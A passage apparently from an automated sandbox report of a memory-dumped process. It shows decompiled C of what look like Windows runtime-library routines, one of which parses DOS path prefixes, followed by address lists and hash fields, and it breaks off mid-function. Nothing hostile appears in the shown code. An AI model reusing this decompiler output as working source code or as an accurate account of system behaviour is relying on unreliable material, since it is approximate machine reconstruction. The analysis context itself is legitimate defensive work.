                                                      											if( *(_t528 + 0x1c) <= 0) {
                                                      												L45:
                                                      												__eflags =  *(_t528 - 0xb0);
                                                      												if( *(_t528 - 0xb0) != 0) {
                                                      													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                      													__eflags = _t511;
                                                      												}
                                                      												__eflags = _t475;
                                                      												if(_t475 != 0) {
                                                      													asm("lock dec dword [ecx+edx*8+0x4]");
                                                      													goto L100;
                                                      												} else {
                                                      													_t494[3] = _t511;
                                                      													_t451 =  *(_t528 - 0xa0);
                                                      													_t427 = E017E6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                                      													 *(_t528 - 0x88) = _t427;
                                                      													__eflags = _t427;
                                                      													if(_t427 == 0) {
                                                      														__eflags = _t511 - 0xfff8;
                                                      														if(_t511 <= 0xfff8) {
                                                      															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                                      															asm("sbb ecx, ecx");
                                                      															__eflags = (_t451 & 0x000000e2) + 8;
                                                      														}
                                                      														asm("lock dec dword [eax+edx*8+0x4]");
                                                      														L100:
                                                      														goto L101;
                                                      													}
                                                      													_t453 =  *(_t528 - 0xa0);
                                                      													 *_t494 = _t453;
                                                      													_t494[1] = _t427;
                                                      													_t494[2] =  *(_t528 - 0xbc);
                                                      													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                                      													 *_t427 =  *(_t453 + 0x24) | _t511;
                                                      													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                                      													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													__eflags =  *(_t528 + 0x14);
                                                      													if( *(_t528 + 0x14) == 0) {
                                                      														__eflags =  *[fs:0x18] + 0xf50;
                                                      													}
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													__eflags =  *(_t528 + 0x18);
                                                      													if( *(_t528 + 0x18) == 0) {
                                                      														_t454 =  *(_t528 - 0x80);
                                                      														_t479 =  *(_t528 - 0x78);
                                                      														_t327 = 1;
                                                      														__eflags = 1;
                                                      													} else {
                                                      														_t146 = _t427 + 0x50; // 0x50
                                                      														_t454 = _t146;
                                                      														 *(_t528 - 0x80) = _t454;
                                                      														_t382 = 0x18;
                                                      														 *_t454 = _t382;
                                                      														 *((short*)(_t454 + 2)) = 1;
                                                      														_t385 = 0x10;
                                                      														 *((short*)(_t454 + 6)) = _t385;
                                                      														 *(_t454 + 4) = 0;
                                                      														asm("movsd");
                                                      														asm("movsd");
                                                      														asm("movsd");
                                                      														asm("movsd");
                                                      														_t327 = 1;
                                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                      														_t479 = 0x68;
                                                      														 *(_t528 - 0x78) = _t479;
                                                      													}
                                                      													__eflags =  *(_t528 - 0x79) - _t327;
                                                      													if( *(_t528 - 0x79) == _t327) {
                                                      														_t524 = _t479 + _t427;
                                                      														_t508 =  *(_t528 - 0x8c);
                                                      														 *_t524 = _t508;
                                                      														_t373 = 2;
                                                      														 *((short*)(_t524 + 2)) = _t373;
                                                      														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                                      														 *((short*)(_t524 + 4)) = 0;
                                                      														_t167 = _t524 + 8; // 0x8
                                                      														E017EF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                      														_t529 = _t529 + 0xc;
                                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                      														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                      														 *(_t528 - 0x78) = _t479;
                                                      														_t380 =  *(_t528 - 0x80);
                                                      														__eflags = _t380;
                                                      														if(_t380 != 0) {
                                                      															_t173 = _t380 + 4;
                                                      															 *_t173 =  *(_t380 + 4) | 1;
                                                      															__eflags =  *_t173;
                                                      														}
                                                      														_t454 = _t524;
                                                      														 *(_t528 - 0x80) = _t454;
                                                      														_t327 = 1;
                                                      														__eflags = 1;
                                                      													}
                                                      													__eflags =  *(_t528 - 0xd4);
                                                      													if( *(_t528 - 0xd4) == 0) {
                                                      														_t505 =  *(_t528 - 0x80);
                                                      													} else {
                                                      														_t505 = _t479 + _t427;
                                                      														_t523 = 0x10;
                                                      														 *_t505 = _t523;
                                                      														_t367 = 3;
                                                      														 *((short*)(_t505 + 2)) = _t367;
                                                      														_t368 = 4;
                                                      														 *((short*)(_t505 + 6)) = _t368;
                                                      														 *(_t505 + 4) = 0;
                                                      														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                      														_t327 = 1;
                                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                      														_t479 = _t479 + _t523;
                                                      														 *(_t528 - 0x78) = _t479;
                                                      														__eflags = _t454;
                                                      														if(_t454 != 0) {
                                                      															_t186 = _t454 + 4;
                                                      															 *_t186 =  *(_t454 + 4) | 1;
                                                      															__eflags =  *_t186;
                                                      														}
                                                      														 *(_t528 - 0x80) = _t505;
                                                      													}
                                                      													__eflags =  *(_t528 - 0x7a) - _t327;
                                                      													if( *(_t528 - 0x7a) == _t327) {
                                                      														 *(_t528 - 0xd4) = _t479 + _t427;
                                                      														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                      														E017EF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                      														_t529 = _t529 + 0xc;
                                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                      														_t479 =  *(_t528 - 0x78) + _t522;
                                                      														 *(_t528 - 0x78) = _t479;
                                                      														__eflags = _t505;
                                                      														if(_t505 != 0) {
                                                      															_t199 = _t505 + 4;
                                                      															 *_t199 =  *(_t505 + 4) | 1;
                                                      															__eflags =  *_t199;
                                                      														}
                                                      														_t505 =  *(_t528 - 0xd4);
                                                      														 *(_t528 - 0x80) = _t505;
                                                      													}
                                                      													__eflags =  *(_t528 - 0xa8);
                                                      													if( *(_t528 - 0xa8) != 0) {
                                                      														_t356 = _t479 + _t427;
                                                      														 *(_t528 - 0xd4) = _t356;
                                                      														_t462 =  *(_t528 - 0xac);
                                                      														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                      														_t485 = 0xc;
                                                      														 *((short*)(_t356 + 2)) = _t485;
                                                      														 *(_t356 + 6) = _t462;
                                                      														 *((short*)(_t356 + 4)) = 0;
                                                      														_t211 = _t356 + 8; // 0x9
                                                      														E017EF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                      														E017EFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                      														_t529 = _t529 + 0x18;
                                                      														_t427 =  *(_t528 - 0x88);
                                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                      														_t505 =  *(_t528 - 0xd4);
                                                      														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                      														 *(_t528 - 0x78) = _t479;
                                                      														_t362 =  *(_t528 - 0x80);
                                                      														__eflags = _t362;
                                                      														if(_t362 != 0) {
                                                      															_t222 = _t362 + 4;
                                                      															 *_t222 =  *(_t362 + 4) | 1;
                                                      															__eflags =  *_t222;
                                                      														}
                                                      													}
                                                      													__eflags =  *(_t528 - 0xb0);
                                                      													if( *(_t528 - 0xb0) != 0) {
                                                      														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                      														_t458 = 0xb;
                                                      														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                      														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                      														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                      														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                                      														E017EFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                      														_t529 = _t529 + 0xc;
                                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                      														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                      														 *(_t528 - 0x78) = _t479;
                                                      														__eflags = _t505;
                                                      														if(_t505 != 0) {
                                                      															_t241 = _t505 + 4;
                                                      															 *_t241 =  *(_t505 + 4) | 1;
                                                      															__eflags =  *_t241;
                                                      														}
                                                      													}
                                                      													_t328 =  *(_t528 + 0x1c);
                                                      													__eflags = _t328;
                                                      													if(_t328 == 0) {
                                                      														L87:
                                                      														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                      														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                      														_t455 =  *(_t528 - 0xdc);
                                                      														 *(_t427 + 0x14) = _t455;
                                                      														_t480 =  *(_t528 - 0xa0);
                                                      														_t517 = 3;
                                                      														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                      														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                      															asm("rdtsc");
                                                      															 *(_t427 + 0x3c) = _t480;
                                                      														} else {
                                                      															 *(_t427 + 0x3c) = _t455;
                                                      														}
                                                      														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                      														_t456 =  *[fs:0x18];
                                                      														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                                      														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                      														_t427 = 0;
                                                      														__eflags = 0;
                                                      														_t511 = 0x18;
                                                      														goto L91;
                                                      													} else {
                                                      														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                      														__eflags = _t519;
                                                      														 *(_t528 - 0x8c) = _t328;
                                                      														do {
                                                      															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                      															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                      															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                      															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                      															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                      															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                      																_t334 =  *_t519;
                                                      															} else {
                                                      																_t334 = 0;
                                                      															}
                                                      															_t336 = _t334 & 0x000000ff;
                                                      															__eflags = _t336;
                                                      															_t427 =  *(_t528 - 0x88);
                                                      															if(_t336 == 0) {
                                                      																_t481 = _t479 + _t506;
                                                      																__eflags = _t481;
                                                      																 *(_t528 - 0x78) = _t481;
                                                      																E017EF3E0(_t479 + _t427, _t457, _t506);
                                                      																_t529 = _t529 + 0xc;
                                                      															} else {
                                                      																_t340 = _t336 - 1;
                                                      																__eflags = _t340;
                                                      																if(_t340 == 0) {
                                                      																	E017EF3E0( *(_t528 - 0xb8), _t457, _t506);
                                                      																	_t529 = _t529 + 0xc;
                                                      																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                      																} else {
                                                      																	__eflags = _t340 == 0;
                                                      																	if(_t340 == 0) {
                                                      																		__eflags = _t506 - 8;
                                                      																		if(_t506 == 8) {
                                                      																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                      																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                      																		}
                                                      																	}
                                                      																}
                                                      															}
                                                      															_t339 = 0x10;
                                                      															_t519 = _t519 + _t339;
                                                      															_t263 = _t528 - 0x8c;
                                                      															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                      															__eflags =  *_t263;
                                                      															_t479 =  *(_t528 - 0x78);
                                                      														} while ( *_t263 != 0);
                                                      														goto L87;
                                                      													}
                                                      												}
                                                      											} else {
                                                      												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                                      												 *(_t528 - 0xa2) = _t392;
                                                      												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                      												__eflags = _t469;
                                                      												while(1) {
                                                      													 *(_t528 - 0xe4) = _t511;
                                                      													__eflags = _t392;
                                                      													_t393 = _t427;
                                                      													if(_t392 != 0) {
                                                      														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                      													}
                                                      													_t395 = (_t393 & 0x000000ff) - _t427;
                                                      													__eflags = _t395;
                                                      													if(_t395 == 0) {
                                                      														_t511 = _t511 +  *_t469;
                                                      														__eflags = _t511;
                                                      													} else {
                                                      														_t398 = _t395 - 1;
                                                      														__eflags = _t398;
                                                      														if(_t398 == 0) {
                                                      															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                      															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                      														} else {
                                                      															__eflags = _t398 == 1;
                                                      															if(_t398 == 1) {
                                                      																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                      																_t402 =  *_t469 & 0x0000ffff;
                                                      																 *(_t528 - 0xac) = _t402;
                                                      																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                      															}
                                                      														}
                                                      													}
                                                      													__eflags = _t511 -  *(_t528 - 0xe4);
                                                      													if(_t511 <  *(_t528 - 0xe4)) {
                                                      														break;
                                                      													}
                                                      													_t397 =  *(_t528 - 0x88) + 1;
                                                      													 *(_t528 - 0x88) = _t397;
                                                      													_t469 = _t469 + 0x10;
                                                      													__eflags = _t397 -  *(_t528 + 0x1c);
                                                      													_t392 =  *(_t528 - 0xa2);
                                                      													if(_t397 <  *(_t528 + 0x1c)) {
                                                      														continue;
                                                      													}
                                                      													goto L45;
                                                      												}
                                                      												_t475 = 0x216;
                                                      												 *(_t528 - 0x74) = 0x216;
                                                      												goto L45;
                                                      											}
                                                      										} else {
                                                      											asm("lock dec dword [eax+ecx*8+0x4]");
                                                      											goto L16;
                                                      										}
                                                      									}
                                                      									_t491 = E01874CAB(_t306, _t528 - 0xa4);
                                                      									 *(_t528 - 0x74) = _t491;
                                                      									__eflags = _t491;
                                                      									if(_t491 != 0) {
                                                      										goto L91;
                                                      									} else {
                                                      										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                      										goto L20;
                                                      									}
                                                      								}
                                                      								L16:
                                                      								 *(_t528 - 0x74) = 0x1069;
                                                      								L93:
                                                      								_t298 =  *(_t528 - 0xd0) + 1;
                                                      								 *(_t528 - 0xd0) = _t298;
                                                      								_t474 = _t474 + _t511;
                                                      								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                      								_t494 = 4;
                                                      								__eflags = _t298 - _t494;
                                                      								if(_t298 >= _t494) {
                                                      									goto L100;
                                                      								}
                                                      								_t494 =  *(_t528 - 0xcc);
                                                      								_t435 = _t298;
                                                      								continue;
                                                      							}
                                                      							__eflags = _t494[2] | _t494[3];
                                                      							if((_t494[2] | _t494[3]) == 0) {
                                                      								goto L15;
                                                      							}
                                                      							goto L12;
                                                      						}
                                                      						__eflags = _t301;
                                                      						if(_t301 != 0) {
                                                      							goto L92;
                                                      						}
                                                      						goto L10;
                                                      						L92:
                                                      						goto L93;
                                                      					}
                                                      				} else {
                                                      					_push(0x57);
                                                      					L101:
                                                      					return E017FD130(_t427, _t494, _t511);
                                                      				}
                                                      			}










































































                                                      0x0187614f
                                                      0x0187614f
                                                      0x0187614f
                                                      0x01876153
                                                      0x01876159
                                                      0x01876159
                                                      0x0187615c
                                                      0x01876163
                                                      0x01876169
                                                      0x0187616c
                                                      0x01876172
                                                      0x01876181
                                                      0x01876186
                                                      0x01876187
                                                      0x0187618b
                                                      0x01876191
                                                      0x01876195
                                                      0x018761a3
                                                      0x018761bb
                                                      0x018761c0
                                                      0x018761c3
                                                      0x018761cc
                                                      0x018761d0
                                                      0x018761dc
                                                      0x018761de
                                                      0x018761e1
                                                      0x018761e4
                                                      0x018761e6
                                                      0x018761e8
                                                      0x018761e8
                                                      0x018761e8
                                                      0x018761e8
                                                      0x018761e6
                                                      0x018761ec
                                                      0x018761f3
                                                      0x01876203
                                                      0x01876209
                                                      0x0187620a
                                                      0x01876216
                                                      0x0187621d
                                                      0x01876227
                                                      0x01876241
                                                      0x01876246
                                                      0x0187624c
                                                      0x01876257
                                                      0x01876259
                                                      0x0187625c
                                                      0x0187625e
                                                      0x01876260
                                                      0x01876260
                                                      0x01876260
                                                      0x01876260
                                                      0x0187625e
                                                      0x01876264
                                                      0x01876267
                                                      0x01876269
                                                      0x01876315
                                                      0x01876315
                                                      0x0187631b
                                                      0x0187631e
                                                      0x01876324
                                                      0x01876327
                                                      0x0187632f
                                                      0x01876330
                                                      0x01876333
                                                      0x0187633a
                                                      0x0187633c
                                                      0x01876335
                                                      0x01876335
                                                      0x01876335
                                                      0x0187633f
                                                      0x01876342
                                                      0x0187634c
                                                      0x01876352
                                                      0x01876355
                                                      0x01876355
                                                      0x01876359
                                                      0x00000000
                                                      0x0187626f
                                                      0x01876275
                                                      0x01876275
                                                      0x01876278
                                                      0x0187627e
                                                      0x0187627e
                                                      0x01876281
                                                      0x01876287
                                                      0x0187628d
                                                      0x01876298
                                                      0x0187629c
                                                      0x018762a2
                                                      0x0187629e
                                                      0x0187629e
                                                      0x0187629e
                                                      0x018762a7
                                                      0x018762a7
                                                      0x018762aa
                                                      0x018762b0
                                                      0x018762f0
                                                      0x018762f0
                                                      0x018762f2
                                                      0x018762f8
                                                      0x018762fd
                                                      0x018762b2
                                                      0x018762b2
                                                      0x018762b2
                                                      0x018762b5
                                                      0x018762dd
                                                      0x018762e2
                                                      0x018762e5
                                                      0x018762b7
                                                      0x018762b8
                                                      0x018762bb
                                                      0x018762bd
                                                      0x018762c0
                                                      0x018762c4
                                                      0x018762cd
                                                      0x018762cd
                                                      0x018762c0
                                                      0x018762bb
                                                      0x018762b5
                                                      0x01876302
                                                      0x01876303
                                                      0x01876305
                                                      0x01876305
                                                      0x01876305
                                                      0x0187630c
                                                      0x0187630c
                                                      0x00000000
                                                      0x0187627e
                                                      0x01876269
                                                      0x01875eac
                                                      0x01875ebb
                                                      0x01875ebe
                                                      0x01875ecb
                                                      0x01875ecb
                                                      0x01875ece
                                                      0x01875ece
                                                      0x01875ed4
                                                      0x01875ed7
                                                      0x01875ed9
                                                      0x01875edb
                                                      0x01875edb
                                                      0x01875ee1
                                                      0x01875ee1
                                                      0x01875ee3
                                                      0x01875f20
                                                      0x01875f20
                                                      0x01875ee5
                                                      0x01875ee5
                                                      0x01875ee5
                                                      0x01875ee8
                                                      0x01875f11
                                                      0x01875f18
                                                      0x01875eea
                                                      0x01875eea
                                                      0x01875eed
                                                      0x01875ef2
                                                      0x01875ef8
                                                      0x01875efb
                                                      0x01875f0a
                                                      0x01875f0a
                                                      0x01875eed
                                                      0x01875ee8
                                                      0x01875f22
                                                      0x01875f28
                                                      0x00000000
                                                      0x00000000
                                                      0x01875f30
                                                      0x01875f31
                                                      0x01875f37
                                                      0x01875f3a
                                                      0x01875f3d
                                                      0x01875f44
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01875f46
                                                      0x01875f48
                                                      0x01875f4d
                                                      0x00000000
                                                      0x01875f4d
                                                      0x01875dda
                                                      0x01875ddf
                                                      0x00000000
                                                      0x01875ddf
                                                      0x01875dd8
                                                      0x01875da7
                                                      0x01875da9
                                                      0x01875dac
                                                      0x01875dae
                                                      0x00000000
                                                      0x01875db4
                                                      0x01875db4
                                                      0x00000000
                                                      0x01875db4
                                                      0x01875dae
                                                      0x01875d88
                                                      0x01875d8d
                                                      0x01876363
                                                      0x01876369
                                                      0x0187636a
                                                      0x01876370
                                                      0x01876372
                                                      0x0187637a
                                                      0x0187637b
                                                      0x0187637d
                                                      0x00000000
                                                      0x00000000
                                                      0x0187637f
                                                      0x01876385
                                                      0x00000000
                                                      0x01876385
                                                      0x01875d38
                                                      0x01875d3b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01875d3b
                                                      0x01875d27
                                                      0x01875d29
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01876360
                                                      0x00000000
                                                      0x01876360
                                                      0x01875c10
                                                      0x01875c10
                                                      0x018763da
                                                      0x018763e5
                                                      0x018763e5

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 25a16a7cefb93bc732ef87adb9415dfedd548531fb3ec733a67218f9169eda94
                                                      • Instruction ID: 9771333deee99479cd2b4da13564b013ac13bd8b2da58ae1ce6a2d1f72b94664
                                                      • Opcode Fuzzy Hash: 25a16a7cefb93bc732ef87adb9415dfedd548531fb3ec733a67218f9169eda94
                                                      • Instruction Fuzzy Hash: C2423C75900619CFEB25CF68C884BA9BBB1FF49304F1481AAD94DEB242E774DA85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E017C4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                      				signed int _v8;
                                                      				void* _v20;
                                                      				signed int _v24;
                                                      				char _v532;
                                                      				char _v540;
                                                      				signed short _v544;
                                                      				signed int _v548;
                                                      				signed short* _v552;
                                                      				signed short _v556;
                                                      				signed short* _v560;
                                                      				signed short* _v564;
                                                      				signed short* _v568;
                                                      				void* _v570;
                                                      				signed short* _v572;
                                                      				signed short _v576;
                                                      				signed int _v580;
                                                      				char _v581;
                                                      				void* _v584;
                                                      				unsigned int _v588;
                                                      				signed short* _v592;
                                                      				void* _v597;
                                                      				void* _v600;
                                                      				void* _v604;
                                                      				void* _v609;
                                                      				void* _v616;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				unsigned int _t161;
                                                      				signed int _t162;
                                                      				unsigned int _t163;
                                                      				void* _t169;
                                                      				signed short _t173;
                                                      				signed short _t177;
                                                      				signed short _t181;
                                                      				unsigned int _t182;
                                                      				signed int _t185;
                                                      				signed int _t213;
                                                      				signed int _t225;
                                                      				short _t233;
                                                      				signed char _t234;
                                                      				signed int _t242;
                                                      				signed int _t243;
                                                      				signed int _t244;
                                                      				signed int _t245;
                                                      				signed int _t250;
                                                      				void* _t251;
                                                      				signed short* _t254;
                                                      				void* _t255;
                                                      				signed int _t256;
                                                      				void* _t257;
                                                      				signed short* _t260;
                                                      				signed short _t265;
                                                      				signed short* _t269;
                                                      				signed short _t271;
                                                      				signed short** _t272;
                                                      				signed short* _t275;
                                                      				signed short _t282;
                                                      				signed short _t283;
                                                      				signed short _t290;
                                                      				signed short _t299;
                                                      				signed short _t307;
                                                      				signed int _t308;
                                                      				signed short _t311;
                                                      				signed short* _t315;
                                                      				signed short _t316;
                                                      				void* _t317;
                                                      				void* _t319;
                                                      				signed short* _t321;
                                                      				void* _t322;
                                                      				void* _t323;
                                                      				unsigned int _t324;
                                                      				signed int _t325;
                                                      				void* _t326;
                                                      				signed int _t327;
                                                      				signed int _t329;
                                                      
                                                      				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                      				_v8 =  *0x189d360 ^ _t329;
                                                      				_t157 = _a8;
                                                      				_t321 = _a4;
                                                      				_t315 = __edx;
                                                      				_v548 = __ecx;
                                                      				_t305 = _a20;
                                                      				_v560 = _a12;
                                                      				_t260 = _a16;
                                                      				_v564 = __edx;
                                                      				_v580 = _a8;
                                                      				_v572 = _t260;
                                                      				_v544 = _a20;
                                                      				if( *__edx <= 8) {
                                                      					L3:
                                                      					if(_t260 != 0) {
                                                      						 *_t260 = 0;
                                                      					}
                                                      					_t254 =  &_v532;
                                                      					_v588 = 0x208;
                                                      					if((_v548 & 0x00000001) != 0) {
                                                      						_v556 =  *_t315;
                                                      						_v552 = _t315[2];
                                                      						_t161 = E017DF232( &_v556);
                                                      						_t316 = _v556;
                                                      						_v540 = _t161;
                                                      						goto L17;
                                                      					} else {
                                                      						_t306 = 0x208;
                                                      						_t298 = _t315;
                                                      						_t316 = E017C6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                      						if(_t316 == 0) {
                                                      							L68:
                                                      							_t322 = 0xc0000033;
                                                      							goto L39;
                                                      						} else {
                                                      							while(_v581 == 0) {
                                                      								_t233 = _v588;
                                                      								if(_t316 > _t233) {
                                                      									_t234 = _v548;
                                                      									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                                      										_t254 = L017C4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                                      										if(_t254 == 0) {
                                                      											_t169 = 0xc0000017;
                                                      										} else {
                                                      											_t298 = _v564;
                                                      											_v588 = _t316;
                                                      											_t306 = _t316;
                                                      											_t316 = E017C6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                                      											if(_t316 != 0) {
                                                      												continue;
                                                      											} else {
                                                      												goto L68;
                                                      											}
                                                      										}
                                                      									} else {
                                                      										goto L90;
                                                      									}
                                                      								} else {
                                                      									_v556 = _t316;
                                                      									 *((short*)(_t329 + 0x32)) = _t233;
                                                      									_v552 = _t254;
                                                      									if(_t316 < 2) {
                                                      										L11:
                                                      										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                                      											_t161 = 5;
                                                      										} else {
                                                      											if(_t316 < 6) {
                                                      												L87:
                                                      												_t161 = 3;
                                                      											} else {
                                                      												_t242 = _t254[2] & 0x0000ffff;
                                                      												if(_t242 != 0x5c) {
                                                      													if(_t242 == 0x2f) {
                                                      														goto L16;
                                                      													} else {
                                                      														goto L87;
                                                      													}
                                                      													goto L101;
                                                      												} else {
                                                      													L16:
                                                      													_t161 = 2;
                                                      												}
                                                      											}
                                                      										}
                                                      									} else {
                                                      										_t243 =  *_t254 & 0x0000ffff;
                                                      										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                      											if(_t316 < 4) {
                                                      												L81:
                                                      												_t161 = 4;
                                                      												goto L17;
                                                      											} else {
                                                      												_t244 = _t254[1] & 0x0000ffff;
                                                      												if(_t244 != 0x5c) {
                                                      													if(_t244 == 0x2f) {
                                                      														goto L60;
                                                      													} else {
                                                      														goto L81;
                                                      													}
                                                      												} else {
                                                      													L60:
                                                      													if(_t316 < 6) {
                                                      														L83:
                                                      														_t161 = 1;
                                                      														goto L17;
                                                      													} else {
                                                      														_t245 = _t254[2] & 0x0000ffff;
                                                      														if(_t245 != 0x2e) {
                                                      															if(_t245 == 0x3f) {
                                                      																goto L62;
                                                      															} else {
                                                      																goto L83;
                                                      															}
                                                      														} else {
                                                      															L62:
                                                      															if(_t316 < 8) {
                                                      																L85:
                                                      																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                      																goto L17;
                                                      															} else {
                                                      																_t250 = _t254[3] & 0x0000ffff;
                                                      																if(_t250 != 0x5c) {
                                                      																	if(_t250 == 0x2f) {
                                                      																		goto L64;
                                                      																	} else {
                                                      																		goto L85;
                                                      																	}
                                                      																} else {
                                                      																	L64:
                                                      																	_t161 = 6;
                                                      																	goto L17;
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      											goto L101;
                                                      										} else {
                                                      											goto L11;
                                                      										}
                                                      									}
                                                      									L17:
                                                      									if(_t161 != 2) {
                                                      										_t162 = _t161 - 1;
                                                      										if(_t162 > 5) {
                                                      											goto L18;
                                                      										} else {
                                                      											switch( *((intOrPtr*)(_t162 * 4 +  &M017C45F8))) {
                                                      												case 0:
                                                      													_v568 = 0x1781078;
                                                      													__eax = 2;
                                                      													goto L20;
                                                      												case 1:
                                                      													goto L18;
                                                      												case 2:
                                                      													_t163 = 4;
                                                      													goto L19;
                                                      											}
                                                      										}
                                                      										goto L41;
                                                      									} else {
                                                      										L18:
                                                      										_t163 = 0;
                                                      										L19:
                                                      										_v568 = 0x17811c4;
                                                      									}
                                                      									L20:
                                                      									_v588 = _t163;
                                                      									_v564 = _t163 + _t163;
                                                      									_t306 =  *_v568 & 0x0000ffff;
                                                      									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                      									_v576 = _t265;
                                                      									if(_t265 > 0xfffe) {
                                                      										L90:
                                                      										_t322 = 0xc0000106;
                                                      									} else {
                                                      										if(_t321 != 0) {
                                                      											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                      												if(_v580 != 0) {
                                                      													goto L23;
                                                      												} else {
                                                      													_t322 = 0xc0000106;
                                                      													goto L39;
                                                      												}
                                                      											} else {
                                                      												_t177 = _t306;
                                                      												goto L25;
                                                      											}
                                                      											goto L101;
                                                      										} else {
                                                      											if(_v580 == _t321) {
                                                      												_t322 = 0xc000000d;
                                                      											} else {
                                                      												L23:
                                                      												_t173 = L017C4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                      												_t269 = _v592;
                                                      												_t269[2] = _t173;
                                                      												if(_t173 == 0) {
                                                      													_t322 = 0xc0000017;
                                                      												} else {
                                                      													_t316 = _v556;
                                                      													 *_t269 = 0;
                                                      													_t321 = _t269;
                                                      													_t269[1] = _v576;
                                                      													_t177 =  *_v568 & 0x0000ffff;
                                                      													L25:
